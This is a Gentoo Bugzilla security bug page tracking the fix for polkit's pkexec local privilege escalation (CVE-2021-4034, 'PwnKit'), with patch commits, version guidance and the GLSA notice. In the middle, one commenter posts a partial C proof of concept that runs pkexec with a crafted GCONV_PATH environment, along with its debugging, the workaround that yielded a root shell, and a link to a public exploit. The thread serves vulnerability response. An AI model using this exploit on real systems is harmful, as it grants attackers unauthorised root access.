| Summary: | <sys-auth/polkit-0.120-r2: Local privilege escalation (CVE-2021-4034) | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Sam James <sam> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED FIXED | ||
| Severity: | critical | CC: | foufou33, freedesktop-bugs, mike, orzel |
| Priority: | Normal | Keywords: | PullRequest |
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt | ||
| See Also: | https://github.com/gentoo/gentoo/pull/23980 | ||
| Whiteboard: | A1 [glsa] | ||
| Package list: | Runtime testing required: | --- | |
| Bug Depends on: | 832060, 832075 | ||
| Bug Blocks: | |||
|
Description
Sam James
2022-01-25 17:06:56 UTC
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d0e16d6fb24423388c5acd74e5f0b9856af08f08 commit d0e16d6fb24423388c5acd74e5f0b9856af08f08 Author: Sam James <sam@gentoo.org> AuthorDate: 2022-01-25 17:25:25 +0000 Commit: Sam James <sam@gentoo.org> CommitDate: 2022-01-25 17:25:54 +0000 sys-auth/polkit: fix CVE-2021-4043 Bug: https://bugs.gentoo.org/832057 Signed-off-by: Sam James <sam@gentoo.org> .../polkit/files/polkit-0.120-CVE-2021-4043.patch | 72 +++++++++++++ sys-auth/polkit/polkit-0.120-r2.ebuild | 120 +++++++++++++++++++++ 2 files changed, 192 insertions(+) The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=77e50819c7c7c22dee5ee6b2e7538b3cfff789af commit 77e50819c7c7c22dee5ee6b2e7538b3cfff789af Author: Sam James <sam@gentoo.org> AuthorDate: 2022-01-26 00:50:34 +0000 Commit: Sam James <sam@gentoo.org> CommitDate: 2022-01-26 00:51:00 +0000 sys-auth/polkit: backport CVE-2021-3560, CVE-2021-4043 patches to 0.117 Needed for non-Rust arches like sparc. (Most users are on 0.120 and already fixed in previous commits.) Bug: https://bugs.gentoo.org/794052 Bug: https://bugs.gentoo.org/832057 Signed-off-by: Sam James <sam@gentoo.org> .../polkit/files/polkit-0.117-CVE-2021-3560.patch | 29 +++++ sys-auth/polkit/polkit-0.117-r3.ebuild | 136 +++++++++++++++++++++ 2 files changed, 165 insertions(+) polkit-0.120-r2 is already stable, so how users should apply the fix? Portage doesn't offer anything to rebuild. Should this be addressed by using glsa-check? I missed the fact that 0.120-r2 went stable today with the fix and it was installed on my system. Sorry for the noise. I dont understand. How do I know if the polkit on my systems has the fix or not ? Which package versions are ok ? (In reply to Thomas Capricelli from comment #5) > I dont understand. How do I know if the polkit on my systems has the fix or > not ? > > Which package versions are ok ? Hi Thomas, please refer to the title which says "<sys-auth/polkit-0.120-r2". This means that any version number of polkit with a version below 0.120-r2 is vunerable and affected by the bug, not including 0.120-r2 itself (that would be <= instead). You can update polkit e.g by running 'emerge --sync && emerge --ask --oneshot --verbose sys-auth/polkit'. For further questions please consult the wiki, the forum and/or any of the IRC channels. (In reply to Nils Freydank from comment #6) > For further questions > please consult the wiki, the forum and/or any of the IRC channels. Hi Nils. No further question, your answer was perfect. Thanks for clarifying. The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/data/glsa.git/commit/?id=3b7263dbbe36631a95b29efe1f17ce9dfb40cc90 commit 3b7263dbbe36631a95b29efe1f17ce9dfb40cc90 Author: Sam James <sam@gentoo.org> AuthorDate: 2022-01-27 05:33:39 +0000 Commit: Sam James <sam@gentoo.org> CommitDate: 2022-01-27 05:34:25 +0000 [ GLSA 202201-01 ] Polkit: Local privilege escalation Bug: https://bugs.gentoo.org/832057 Signed-off-by: Sam James <sam@gentoo.org> glsa-202201-01.xml | 43 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=943593956c04c5c2b1f1c679d5b3f36428d1173a commit 943593956c04c5c2b1f1c679d5b3f36428d1173a Author: Mathieu Tortuyaux <mtortuyaux@microsoft.com> AuthorDate: 2022-01-27 09:31:48 +0000 Commit: Sam James <sam@gentoo.org> CommitDate: 2022-01-27 19:50:27 +0000 sys-auth/polkit: fix CVE id Nit-pick to avoid confusion. Bug: https://bugs.gentoo.org/832057 Package-Manager: Portage-3.0.28, Repoman-3.0.3 Signed-off-by: Mathieu Tortuyaux <mtortuyaux@microsoft.com> Closes: https://github.com/gentoo/gentoo/pull/23980 Signed-off-by: Sam James <sam@gentoo.org> ...olkit-0.120-CVE-2021-4043.patch => polkit-0.120-CVE-2021-4034.patch} | 0 sys-auth/polkit/polkit-0.117-r3.ebuild | 2 +- sys-auth/polkit/polkit-0.120-r2.ebuild | 2 +- 3 files changed, 2 insertions(+), 2 deletions(-) stupid question, has anyone checked that the exploit actually works? Asking b/c the same PoC code works on non patched debian/redhat (derivatives) but fails miserably with gentoo (and may be arch), with sys-auth/polkit-0.120-r1. Traced tot the getenv call that's supposed to get GCONV_PATH. if fails here (getenv.c): 85 if (name_start == ep_start && !strncmp (*ep + 2, name, len) 86 && (*ep)[len + 2] == '=') *ep points to the original value (called it gconv in my code) not the rewritten one (GCONV_PATH), which is strange as et is initialised from __environ, and __envron[0] point to GCONV_PATH=./gconv I'm really stomped. (In reply to foufou33 from comment #10) > stupid question, has anyone checked that the exploit actually works? > I think there's various PoCs floating around but not Qualys'. > Asking b/c the same PoC code works on non patched debian/redhat > (derivatives) but fails miserably with gentoo (and may be arch), with > sys-auth/polkit-0.120-r1. > > Traced tot the getenv call that's supposed to get GCONV_PATH. if fails here > (getenv.c): > > 85 if (name_start == ep_start && !strncmp (*ep + 2, name, len) > 86 && (*ep)[len + 2] == '=') > > *ep points to the original value (called it gconv in my code) not the > rewritten one (GCONV_PATH), which is strange as et is initialised from > __environ, and __envron[0] point to GCONV_PATH=./gconv > I'm really stomped. I assume you're on a glibc system? I've not really poked at it (ajak@ has though and it worked for him on a Gentoo system, I believe) but it's an interesting question: I wonder if some settings can influence at least one of the exploits (not the vulnerability itself which ofc definitely exists.) I've not gotten one working, but I haven't poked with it outside of my own environment. For fun, I started working on an exploit after the vulnerability was public, but I came to the conclusion that for some reason my environment under Sway isn't affected. Just calling `pkexec` fails: ~ $ pkexec ==== AUTHENTICATING FOR org.freedesktop.policykit.exec ==== Authentication is needed to run `/bin/bash' as the super user Authenticating as: System user; root (root) Password: polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED ==== Error executing command as another user: Not authorized This incident has been reported. I'm not sure what this is about, but after discovering this I stopped working on it. I suspect it's more likely to be affected on GNOME or KDE. (In reply to Sam James from comment #11) > (In reply to foufou33 from comment #10) > > stupid question, has anyone checked that the exploit actually works? > > > > I think there's various PoCs floating around but not Qualys'. > I wrote my own using their description int main (int argc, char **argv) { char *envp[] = {"gconv","PATH=GCONV_PATH=.","CHARSET=DUMMY","SHELL=bash",0}; char *const args[] = {0}; //char exe[] = "./envp"; char exe[] = "/usr/bin/pkexec"; execve(exe, args,envp); return 0; } (mkdir 'GCONV_PATH=.' && touch 'GCONV_PATH=.'/gconv && mkdir gconv ...etc) gconv dir contains > > Asking b/c the same PoC code works on non patched debian/redhat > > (derivatives) but fails miserably with gentoo (and may be arch), with > > sys-auth/polkit-0.120-r1. > > > > Traced tot the getenv call that's supposed to get GCONV_PATH. if fails here > > (getenv.c): > > > > 85 if (name_start == ep_start && !strncmp (*ep + 2, name, len) > > 86 && (*ep)[len + 2] == '=') > > > > *ep points to the original value (called it gconv in my code) not the > > rewritten one (GCONV_PATH), which is strange as et is initialised from > > __environ, and __envron[0] point to GCONV_PATH=./gconv > > I'm really stomped. > > I assume you're on a glibc system? I've not really poked at it (ajak@ has > though and it worked for him on a Gentoo system, I believe) but it's an > interesting question: I wonder if some settings can influence at least one > of the exploits (not the vulnerability itself which ofc definitely exists.) sorry, hit the send button without realsing it :-/
to continue :
gconv dir contains gconv-modules and the .so it is supposed to load (it's content is irrelvant as it is supposed to do whatever we want)
> I assume you're on a glibc system? I've not really poked at it (ajak@ has
> though and it worked for him on a Gentoo system, I believe) but it's an
> interesting question: I wonder if some settings can influence at least one
> of the exploits (not the vulnerability itself which ofc definitely exists.)
yes glibc 2.34 and ahve an old one still on 2.32 same result:
$ ./pwnkit
GLib: Cannot convert message: Could not open converter from “UTF-8” to “DUMMY”
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
instead of a root shell, the reason as I stated the call to getenv("GCONV_PATH") returns null inspite of __envrion[0] == "GCONV_PATH=./gconv".
oh well, setting GIO_USE_VFS= seems to fix it ./pwnkit.exe pwned sh-5.1# stolen from here : https://github.com/berdav/CVE-2021-4034/commit/c219bcab54ec532ab4ead63ecb311e9d16a367d0 The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c0502be50e13cb62efd5c5fbb3e2cac255490e15 commit c0502be50e13cb62efd5c5fbb3e2cac255490e15 Author: Andreas Sturmlechner <asturm@gentoo.org> AuthorDate: 2022-02-05 20:30:47 +0000 Commit: Andreas Sturmlechner <asturm@gentoo.org> CommitDate: 2022-02-05 20:40:48 +0000 sys-auth/polkit: Cleanup vulnerable 0.117-r2, 0.119-r2 and 0.120-r1 Bug: https://bugs.gentoo.org/832057 Package-Manager: Portage-3.0.30, Repoman-3.0.3 Signed-off-by: Andreas Sturmlechner <asturm@gentoo.org> sys-auth/polkit/Manifest | 1 - sys-auth/polkit/polkit-0.117-r2.ebuild | 133 --------------------------------- sys-auth/polkit/polkit-0.119-r2.ebuild | 132 -------------------------------- sys-auth/polkit/polkit-0.120-r1.ebuild | 119 ----------------------------- 4 files changed, 385 deletions(-) GLSA was done in https://security.gentoo.org/glsa/202201-01. |